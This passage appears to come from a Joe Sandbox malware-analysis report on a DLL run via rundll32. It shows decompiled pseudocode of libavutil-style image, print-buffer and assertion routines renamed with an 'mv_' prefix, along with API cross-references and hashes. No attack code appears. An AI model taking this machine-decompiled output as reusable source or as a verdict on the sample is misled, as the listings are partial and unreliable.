                                                                      								_a8 = "Error setting option %s to value %s.\n";
                                                                      								_a4 = 0x10;
                                                                      								 *_t58 = _t52;
                                                                      								_a12 =  *_t55;
                                                                      								E10026560();
                                                                      								 *_t58 = _a40;
                                                                      								L10011CC0();
                                                                      								return _a44;
                                                                      							}
                                                                      						}
                                                                      						L10:
                                                                      					}
                                                                      					 *_t58 = _t40;
                                                                      					L10011CC0();
                                                                      					 *_t40 = _a60;
                                                                      					return 0;
                                                                      					goto L10;
                                                                      				}
                                                                      				goto L5;
                                                                      			}













                                                                      APIs
                                                                      Strings
                                                                      • Error setting option %s to value %s., xrefs: 10030217
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.488308300.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                      • Associated: 00000003.00000002.488304107.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488403231.00000000100AD000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488409319.00000000100AE000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488434034.00000000101DA000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488441517.00000000101DF000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488447333.00000000101E0000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488447333.00000000101E3000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488476954.00000000101FE000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: mv_dict_freemv_dict_getmv_dict_setmv_logmv_opt_set
                                                                      • String ID: Error setting option %s to value %s.
                                                                      • API String ID: 1354616078-3279051434
                                                                      • Opcode ID: 1bc4169319db0e7c065ad1531228e2073ef3ecfc67cf9b47b9935cbba6993644
                                                                      • Instruction ID: 363f789e0d128d701feb49ee83ad72dbf536247a7b92236e9547f7cdcc278430
                                                                      • Opcode Fuzzy Hash: 1bc4169319db0e7c065ad1531228e2073ef3ecfc67cf9b47b9935cbba6993644
                                                                      • Instruction Fuzzy Hash: A1012CB9A097449FC744DF29D58059ABBE0FB88354F14892EF89CDB310E634E9449B86
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 56%
                                                                      			E1001B0A4(void* __ebx, void* __edi, void* __esi) {
                                                                      				void* _t70;
                                                                      
                                                                      				while(1) {
                                                                      					__ebp = __ebp + __ebp;
                                                                      					__eflags = __ebp - __esi;
                                                                      					if(__eflags > 0) {
                                                                      						break;
                                                                      					}
                                                                      					__eax =  *(__ebx + 0x44);
                                                                      					__ebp =  ~__ebp;
                                                                      					 *(__ebx + 0x44) + __ebp =  *(__ebx + 0x44) + __ebp - 1;
                                                                      					__eax =  *(__ebx + 0x44) + __ebp - 0x00000001 &  ~__ebp;
                                                                      					__esp[2] =  *(__ebx + 0x44) + __ebp - 0x00000001 &  ~__ebp;
                                                                      					__eax =  *(__ebx + 0x50);
                                                                      					 *__esp = __edi;
                                                                      					__esp[1] =  *(__ebx + 0x50);
                                                                      					__eax = E100215D0(__eflags);
                                                                      					__eflags = __eax;
                                                                      					__edx = __eax;
                                                                      					if(__eax < 0) {
                                                                      						L1:
                                                                      						return _t70;
                                                                      					}
                                                                      					__eax =  *(__ebx + 0x20);
                                                                      					__eflags = __esp[0xb] & __eax;
                                                                      					if((__esp[0xb] & __eax) != 0) {
                                                                      						continue;
                                                                      					}
                                                                      					__eflags = __eax;
                                                                      					if(__eflags == 0) {
                                                                      						L10:
                                                                      						__esp[0xc] = __eax;
                                                                      						__eax =  *(__ebx + 0x24);
                                                                      						__esp[0xd] =  *(__ebx + 0x24);
                                                                      						__eax =  *(__ebx + 0x28);
                                                                      						__esp[0xe] =  *(__ebx + 0x28);
                                                                      						__eax =  *(__ebx + 0x2c);
                                                                      						__esp[0xf] =  *(__ebx + 0x2c);
                                                                      						__eax =  *(__ebx + 0x48);
                                                                      						__edi =  *(__ebx + 0x48) + 0x1f;
                                                                      						__eax =  &(__esp[0xc]);
                                                                      						__edi =  *(__ebx + 0x48) + 0x0000001f & 0xffffffe0;
                                                                      						__esp[3] =  &(__esp[0xc]);
                                                                      						__esp[2] = __edi;
                                                                      						__eax =  *(__ebx + 0x50);
                                                                      						__esp[1] =  *(__ebx + 0x50);
                                                                      						__eax =  &(__esp[0x10]);
                                                                      						 *__esp =  &(__esp[0x10]);
                                                                      						__eax = L100219B0(__ebx, __edi, __esi, __ebp, __eflags);
                                                                      						__eflags = __eax;
                                                                      						__edx = __eax;
                                                                      						if(__eax < 0) {
                                                                      							goto L1;
                                                                      						}
                                                                      						__eax = 0x20;
                                                                      						__ecx = __esp[0x10];
                                                                      						__edx = 0x7fffffff;
                                                                      						__eflags = __esp[0x1d] - 0x20;
                                                                      						__ebp = 0x7fffffff;
                                                                      						__eax =  >=  ? __esp[0x1d] : 0x20;
                                                                      						__esi = 0x20;
                                                                      						__eax = ( >=  ? __esp[0x1d] : 0x20) * 4;
                                                                      						__ebp = 0x7fffffdf;
                                                                      						__eflags = 0x7fffffdf - __ecx;
                                                                      						if(0x7fffffdf < __ecx) {
                                                                      							L24:
                                                                      							__edx = 0xffffffea;
                                                                      							goto L1;
                                                                      						}
                                                                      						__ecx = __ecx + __eax;
                                                                      						__eax = __esp[0x11];
                                                                      						0x7fffffff = 0x7fffffff - __ecx;
                                                                      						__eflags = 0x7fffffff - __ecx - __eax;
                                                                      						if(0x7fffffff - __ecx < __eax) {
                                                                      							goto L24;
                                                                      						}
                                                                      						__eax = __eax + __ecx;
                                                                      						__ecx = __esp[0x12];
                                                                      						__ebp = 0x7fffffff;
                                                                      						__ebp = 0x7fffffff - __eax;
                                                                      						__eflags = 0x7fffffff - __ecx;
                                                                      						if(0x7fffffff < __ecx) {
                                                                      							goto L24;
                                                                      						}
                                                                      						__eax = __eax + __ecx;
                                                                      						__ecx = __esp[0x13];
                                                                      						__edx = 0x7fffffff - __eax;
                                                                      						__eflags = 0x7fffffff - __eax - __ecx;
                                                                      						if(0x7fffffff - __eax < __ecx) {
                                                                      							goto L24;
                                                                      						}
                                                                      						__eax = L10009DC0(__ebx, __ecx, __edi, 0x20, __ecx);
                                                                      						 *(__ebx + 0xb8) = __eax;
                                                                      						__eflags = __eax;
                                                                      						if(__eflags == 0) {
                                                                      							__edx = 0xfffffff4;
                                                                      							L26:
                                                                      							__esp[0xb] = __edx;
                                                                      							__ebx = E1001A460(__ebx);
                                                                      							__edx = __esp[0xb];
                                                                      							goto L1;
                                                                      						}
                                                                      						__edx = __ebx + 0x20;
                                                                      						__esp[4] = __ebx + 0x20;
                                                                      						__eax =  *(__eax + 4);
                                                                      						__esp[2] = __edi;
                                                                      						__esp[3] = __eax;
                                                                      						__eax =  *(__ebx + 0x50);
                                                                      						 *__esp = __ebx;
                                                                      						__esp[1] =  *(__ebx + 0x50);
                                                                      						__eax = L10021AF0(__ebx, __edi, __esi, __ebp, __eflags);
                                                                      						__eflags = __eax;
                                                                      						__edx = __eax;
                                                                      						if(__eax < 0) {
                                                                      							goto L26;
                                                                      						}
                                                                      						__eax =  *(__ebx + 4);
                                                                      						__eflags = __eax;
                                                                      						if(__eax != 0) {
                                                                      							__eax = __eax + __esi;
                                                                      							__eflags = __eax;
                                                                      							 *(__ebx + 4) = __eax;
                                                                      						}
                                                                      						__eax =  *(__ebx + 8);
                                                                      						__eflags = __eax;
                                                                      						if(__eax != 0) {
                                                                      							 *(__ebx + 8) = __eax;
                                                                      						}
                                                                      						__eax =  *(__ebx + 0xc);
                                                                      						__eflags = __eax;
                                                                      						if(__eax != 0) {
                                                                      							__edx = __esi + __esi * 2;
                                                                      							__eax = __eax + __esi + __esi * 2;
                                                                      							__eflags = __eax;
                                                                      							 *(__ebx + 0xc) = __eax;
                                                                      						}
                                                                      						 *(__ebx + 0x40) = __ebx;
                                                                      						__edx = 0;
                                                                      						goto L1;
                                                                      					}
                                                                      					break;
                                                                      				}
                                                                      				__ecx =  *(__ebx + 0x24);
                                                                      				__eax = __esi + __eax - 1;
                                                                      				__edx = __esi;
                                                                      				__edx =  ~__esi;
                                                                      				__eax = __eax & __edx;
                                                                      				 *(__ebx + 0x20) = __eax;
                                                                      				__eflags = __ecx;
                                                                      				if(__eflags != 0) {
                                                                      					__ecx = __esi + __ecx - 1;
                                                                      					 *(__ebx + 0x24) = __ecx;
                                                                      					__ecx =  *(__ebx + 0x28);
                                                                      					__eflags = __ecx;
                                                                      					if(__eflags != 0) {
                                                                      						__ecx = __esi + __ecx - 1;
                                                                      						 *(__ebx + 0x28) = __ecx;
                                                                      						__ecx =  *(__ebx + 0x2c);
                                                                      						__eflags = __ecx;
                                                                      						if(__eflags != 0) {
                                                                      							__edx = __edx & __ecx;
                                                                      							__eflags = __edx;
                                                                      							 *(__ebx + 0x2c) = __edx;
                                                                      						}
                                                                      					}
                                                                      				}
                                                                      				goto L10;
                                                                      			}




                                                                      0x00000000
                                                                      0x00000000
                                                                      0x1001b1aa
                                                                      0x1001b1ac
                                                                      0x1001b1b0
                                                                      0x1001b1b2
                                                                      0x1001b1b4
                                                                      0x1001b1b6
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x1001b1bc
                                                                      0x1001b1be
                                                                      0x1001b1c2
                                                                      0x1001b1c4
                                                                      0x1001b1c6
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x1001b1cd
                                                                      0x1001b1d2
                                                                      0x1001b1d8
                                                                      0x1001b1da
                                                                      0x1001b2c7
                                                                      0x1001b2cc
                                                                      0x1001b2cc
                                                                      0x1001b2d2
                                                                      0x1001b2d7
                                                                      0x00000000
                                                                      0x1001b2d7
                                                                      0x1001b1e0
                                                                      0x1001b1e3
                                                                      0x1001b1e7
                                                                      0x1001b1ea
                                                                      0x1001b1ee
                                                                      0x1001b1f2
                                                                      0x1001b1f5
                                                                      0x1001b1f8
                                                                      0x1001b1fc
                                                                      0x1001b201
                                                                      0x1001b203
                                                                      0x1001b205
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x1001b20b
                                                                      0x1001b20e
                                                                      0x1001b210
                                                                      0x1001b212
                                                                      0x1001b212
                                                                      0x1001b214
                                                                      0x1001b214
                                                                      0x1001b217
                                                                      0x1001b21a
                                                                      0x1001b21c
                                                                      0x1001b221
                                                                      0x1001b221
                                                                      0x1001b224
                                                                      0x1001b227
                                                                      0x1001b229
                                                                      0x1001b22b
                                                                      0x1001b22e
                                                                      0x1001b22e
                                                                      0x1001b230
                                                                      0x1001b230
                                                                      0x1001b233
                                                                      0x1001b236
                                                                      0x00000000
                                                                      0x1001b236
                                                                      0x00000000
                                                                      0x1001b0e2
                                                                      0x1001b0e4
                                                                      0x1001b0e7
                                                                      0x1001b0eb
                                                                      0x1001b0ed
                                                                      0x1001b0ef
                                                                      0x1001b0f1
                                                                      0x1001b0f4
                                                                      0x1001b0f6
                                                                      0x1001b0f8
                                                                      0x1001b0fe
                                                                      0x1001b101
                                                                      0x1001b104
                                                                      0x1001b106
                                                                      0x1001b108
                                                                      0x1001b10e
                                                                      0x1001b111
                                                                      0x1001b114
                                                                      0x1001b116
                                                                      0x1001b11c
                                                                      0x1001b11c
                                                                      0x1001b11e
                                                                      0x1001b11e
                                                                      0x1001b116
                                                                      0x1001b106
                                                                      0x00000000

                                                                      APIs
                                                                      • mv_image_fill_linesizes.F086 ref: 1001B0C8
                                                                        • Part of subcall function 100215D0: mv_pix_fmt_desc_get.F086(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,1001B0CD), ref: 100215E6
                                                                      • mv_image_fill_plane_sizes.F086 ref: 1001B15D
                                                                      • mv_buffer_alloc.F086 ref: 1001B1CD
                                                                      • mv_image_fill_pointers.F086 ref: 1001B1FC
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.488308300.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                      • Associated: 00000003.00000002.488304107.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488403231.00000000100AD000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488409319.00000000100AE000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488434034.00000000101DA000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488441517.00000000101DF000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488447333.00000000101E0000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488447333.00000000101E3000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488476954.00000000101FE000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: mv_buffer_allocmv_image_fill_linesizesmv_image_fill_plane_sizesmv_image_fill_pointersmv_pix_fmt_desc_get
                                                                      • String ID:
                                                                      • API String ID: 2879504290-0
                                                                      • Opcode ID: 104ea71f64bcf6d5fcf77d597bbab15b8274068533c11a176288c866d61d2df4
                                                                      • Instruction ID: 7a3e12a9aca585330d458c3661a5f2850fdcc4197d16b6054e58506080106dfe
                                                                      • Opcode Fuzzy Hash: 104ea71f64bcf6d5fcf77d597bbab15b8274068533c11a176288c866d61d2df4
                                                                      • Instruction Fuzzy Hash: 1F51F8B5608B018FCB48DF69D59066ABBE1FF88240F1589BDE949CB319E731E844CB41
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • IsDBCSLeadByteEx.KERNEL32 ref: 100A0342
                                                                      • MultiByteToWideChar.KERNEL32 ref: 100A0385
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.488308300.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                      • Associated: 00000003.00000002.488304107.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488403231.00000000100AD000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488409319.00000000100AE000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488434034.00000000101DA000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488441517.00000000101DF000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488447333.00000000101E0000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488447333.00000000101E3000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488476954.00000000101FE000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: Byte$CharLeadMultiWide
                                                                      • String ID:
                                                                      • API String ID: 2561704868-0
                                                                      • Opcode ID: ff6f7197c44d7e7dccd4158c33b178a144c6c1fe7609a9ede9ad65282b7dc5a0
                                                                      • Instruction ID: 7d595e0308f4db80fc988514bbf5ff759a63fd2ee38edf780f56cffaa40d1ea8
                                                                      • Opcode Fuzzy Hash: ff6f7197c44d7e7dccd4158c33b178a144c6c1fe7609a9ede9ad65282b7dc5a0
                                                                      • Instruction Fuzzy Hash: 3D31F4B1509351CFDB40DF69D48420ABBE0FF8A354F05896DF9D48B290E3B6DA48CB42
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.488308300.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                      • Associated: 00000003.00000002.488304107.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488403231.00000000100AD000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488409319.00000000100AE000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488434034.00000000101DA000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488441517.00000000101DF000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488447333.00000000101E0000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488447333.00000000101E3000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488476954.00000000101FE000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: clockmv_sha_finalmv_sha_initmv_sha_update
                                                                      • String ID:
                                                                      • API String ID: 679641161-0
                                                                      • Opcode ID: e23dd5efd1bf3d0f9353d7ec12f2411e5e10918d39fbe7231d3abc0c1350133f
                                                                      • Instruction ID: 408675c28d2283c62ae71b4a23e78d15769cea63b3a73d0841c587d7b5b59e14
                                                                      • Opcode Fuzzy Hash: e23dd5efd1bf3d0f9353d7ec12f2411e5e10918d39fbe7231d3abc0c1350133f
                                                                      • Instruction Fuzzy Hash: 4621C176A043108FE308DF68CAC0249BBE2FBC9315F55C97DD9888B365E671DD058B95
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • mv_mallocz.F086 ref: 1001F0A0
                                                                      • mv_realloc_f.F086 ref: 1001F0DD
                                                                        • Part of subcall function 10028DE0: _aligned_realloc.MSVCRT ref: 10028E11
                                                                      • mv_buffer_create.F086 ref: 1001F128
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.488308300.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                      • Associated: 00000003.00000002.488304107.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488403231.00000000100AD000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488409319.00000000100AE000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488434034.00000000101DA000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488441517.00000000101DF000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488447333.00000000101E0000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488447333.00000000101E3000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488476954.00000000101FE000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: _aligned_reallocmv_buffer_createmv_malloczmv_realloc_f
                                                                      • String ID:
                                                                      • API String ID: 2794559729-0
                                                                      • Opcode ID: 26fbe21ab545ebdd34baa87320ddca8e1bb2c4f4deb69b9881e6a88837f94b66
                                                                      • Instruction ID: c869ac9f6eaa7e77a9466fdee6e8f712de869673a1390132f44f2bab79372784
                                                                      • Opcode Fuzzy Hash: 26fbe21ab545ebdd34baa87320ddca8e1bb2c4f4deb69b9881e6a88837f94b66
                                                                      • Instruction Fuzzy Hash: 8031ACB4A08701DFC300DF29C58051AFBF1FF98250F568A6EE9889B321D771E881CB82
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 37%
                                                                      			E10007050(intOrPtr __ebx, void* __edi, void* __esi, void* __ebp, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                                                      				intOrPtr _v4;
                                                                      				intOrPtr _v1028;
                                                                      				intOrPtr _v1032;
                                                                      				char _v1036;
                                                                      				intOrPtr _v1052;
                                                                      				intOrPtr _v1056;
                                                                      				intOrPtr _v1060;
                                                                      				intOrPtr _v1064;
                                                                      				intOrPtr _t29;
                                                                      				char* _t32;
                                                                      				intOrPtr* _t39;
                                                                      
                                                                      				_t37 = __esi;
                                                                      				_t36 = __edi;
                                                                      				_v4 = __ebx;
                                                                      				_t32 =  &_v1036;
                                                                      				_v1060 = 0x7fffffff;
                                                                      				_v1064 = 1;
                                                                      				 *_t39 = _t32;
                                                                      				L10008880(_t32, __edi, __esi, __ebp);
                                                                      				 *_t39 = _t32;
                                                                      				_v1052 = _a20;
                                                                      				_v1056 = _a16;
                                                                      				_v1060 = _a12;
                                                                      				_v1064 = _a8;
                                                                      				L10009730();
                                                                      				if(_v1032 >= _v1028) {
                                                                      					 *_t39 = _t32;
                                                                      					_v1064 = 0;
                                                                      					E10009690(_t32, 1, _t36, _t37);
                                                                      					_t29 = 0xfffffff4;
                                                                      				} else {
                                                                      					 *_t39 = _t32;
                                                                      					_v1064 = _a4;
                                                                      					_t29 = E10009690(_t32, 1, _t36, _t37);
                                                                      					if(_t29 >= 0) {
                                                                      						_t29 = _v1032;
                                                                      					}
                                                                      				}
                                                                      				return _t29;
                                                                      			}















                                                                      APIs
                                                                      • mv_bprint_init.F086 ref: 10007076
                                                                      • mv_bprint_escape.F086 ref: 100070AA
                                                                        • Part of subcall function 10009730: mv_bprintf.F086(?,?,?,?,?,?,?,?,?,?,100070AF), ref: 100097FB
                                                                      • mv_bprint_finalize.F086 ref: 100070C7
                                                                        • Part of subcall function 10009690: mv_realloc.F086(?,?,?,?,?,?,10006D57), ref: 100096C9
                                                                      • mv_bprint_finalize.F086 ref: 100070F1
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.488308300.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                      • Associated: 00000003.00000002.488304107.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488403231.00000000100AD000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488409319.00000000100AE000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488434034.00000000101DA000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488441517.00000000101DF000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488447333.00000000101E0000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488447333.00000000101E3000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488476954.00000000101FE000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: mv_bprint_finalize$mv_bprint_escapemv_bprint_initmv_bprintfmv_realloc
                                                                      • String ID:
                                                                      • API String ID: 2707718180-0
                                                                      • Opcode ID: 8fcf3987ad7d05698dc9ea44ca5edbe39d28e2b760c260b832d1773102fd6b80
                                                                      • Instruction ID: 7786e306f37471b19b8e033861bf3e046f7241f8be26b7eb16500715b45264db
                                                                      • Opcode Fuzzy Hash: 8fcf3987ad7d05698dc9ea44ca5edbe39d28e2b760c260b832d1773102fd6b80
                                                                      • Instruction Fuzzy Hash: 9F116DB4A093408BD360DF28C18065EBBE0BF88254F908E2DBA9C87345E635A944CB06
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E1001140B(void* __ebx, void* __esi, intOrPtr _a40, intOrPtr _a44, void* _a60, void* _a64, void* _a68, void* _a72, intOrPtr _a80) {
                                                                      				intOrPtr* _t17;
                                                                      
                                                                      				E100290E0(__ebx);
                                                                      				E100290E0(_a80);
                                                                      				 *_t17 = _a40;
                                                                      				L100290D0();
                                                                      				 *_t17 = _a44;
                                                                      				L100290D0();
                                                                      				return __esi;
                                                                      			}

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.488308300.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                      • Associated: 00000003.00000002.488304107.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488403231.00000000100AD000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488409319.00000000100AE000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488434034.00000000101DA000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488441517.00000000101DF000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488447333.00000000101E0000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488447333.00000000101E3000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488476954.00000000101FE000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: mv_freep
                                                                      • String ID:
                                                                      • API String ID: 2373662943-0
                                                                      • Opcode ID: b8978aa5356de5e0d0452b52506a000fc5e3e76e5db4869c3fd5d98213d9114f
                                                                      • Instruction ID: 289599a6c336a5d98a65091fe60646c07369103d16afa4f254b85444868d10c6
                                                                      • Opcode Fuzzy Hash: b8978aa5356de5e0d0452b52506a000fc5e3e76e5db4869c3fd5d98213d9114f
                                                                      • Instruction Fuzzy Hash: 86E079795087188FC600EB68948191AB7F0EB89284F854C1DE9C4A7302D675E940CA82
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      • Assertion %s failed at %s:%d, xrefs: 100224BA
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.488308300.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                      • Associated: 00000003.00000002.488304107.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488403231.00000000100AD000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488409319.00000000100AE000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488434034.00000000101DA000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488441517.00000000101DF000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488447333.00000000101E0000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488447333.00000000101E3000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488476954.00000000101FE000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: mv_get_cpu_flags
                                                                      • String ID: Assertion %s failed at %s:%d
                                                                      • API String ID: 185405932-2766368343
                                                                      • Opcode ID: 6c1046a228a6480c7155eb2475d82291d57ca262918e156c95d3f1e11567d0db
                                                                      • Instruction ID: 9000e0a9215e96f19705fc5f92f59cb8436bb03ac98e3bf4af9b514e39ffaf03
                                                                      • Opcode Fuzzy Hash: 6c1046a228a6480c7155eb2475d82291d57ca262918e156c95d3f1e11567d0db
                                                                      • Instruction Fuzzy Hash: 454112B5A08381AFC740DF94D58051EFBF1FF88740F91891DE99997300D7BAEA858B42
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 28%
                                                                      			E100224F0(signed char _a4, signed int _a8, void* _a12, signed int _a16, int _a20, char _a24) {
                                                                      				intOrPtr _v40;
                                                                      				char* _v44;
                                                                      				char* _v48;
                                                                      				char* _v52;
                                                                      				char* _v56;
                                                                      				signed char _t32;
                                                                      				void* _t34;
                                                                      				int _t35;
                                                                      				int _t43;
                                                                      				void* _t47;
                                                                      				void* _t49;
                                                                      				void* _t52;
                                                                      				signed int _t54;
                                                                      				signed int _t55;
                                                                      				void _t56;
                                                                      				char** _t57;
                                                                      
                                                                      				_t57 =  &_v44;
                                                                      				_t32 = _a4;
                                                                      				_t47 = _a12;
                                                                      				_t54 = _a16;
                                                                      				_t35 = _a20;
                                                                      				if(_t32 == 0 || _t47 == 0) {
                                                                      					L12:
                                                                      					return _t32;
                                                                      				} else {
                                                                      					_t38 =  <  ? _t54 :  ~_t54;
                                                                      					_t60 = _t35 - ( <  ? _t54 :  ~_t54);
                                                                      					if(_t35 > ( <  ? _t54 :  ~_t54)) {
                                                                      						L17:
                                                                      						_v40 = 0x15e;
                                                                      						_v44 = "libavutil/imgutils.c";
                                                                      						_v48 = "((src_linesize) >= 0 ? (src_linesize) : (-(src_linesize))) >= bytewidth";
                                                                      						L16:
                                                                      						_v52 = "Assertion %s failed at %s:%d\n";
                                                                      						_v56 = 0;
                                                                      						 *_t57 = 0;
                                                                      						E10026560();
                                                                      						abort();
                                                                      						goto L17;
                                                                      					}
                                                                      					_t41 =  <  ? _a8 :  ~_a8;
                                                                      					_t61 = _t35 - ( <  ? _a8 :  ~_a8);
                                                                      					if(_t35 > ( <  ? _a8 :  ~_a8)) {
                                                                      						_v40 = 0x15f;
                                                                      						_v44 = "libavutil/imgutils.c";
                                                                      						_v48 = "((dst_linesize) >= 0 ? (dst_linesize) : (-(dst_linesize))) >= bytewidth";
                                                                      						goto L16;
                                                                      					}
                                                                      					if(_a24 <= 0) {
                                                                      						goto L12;
                                                                      					}
                                                                      					_a16 = _t54;
                                                                      					do {
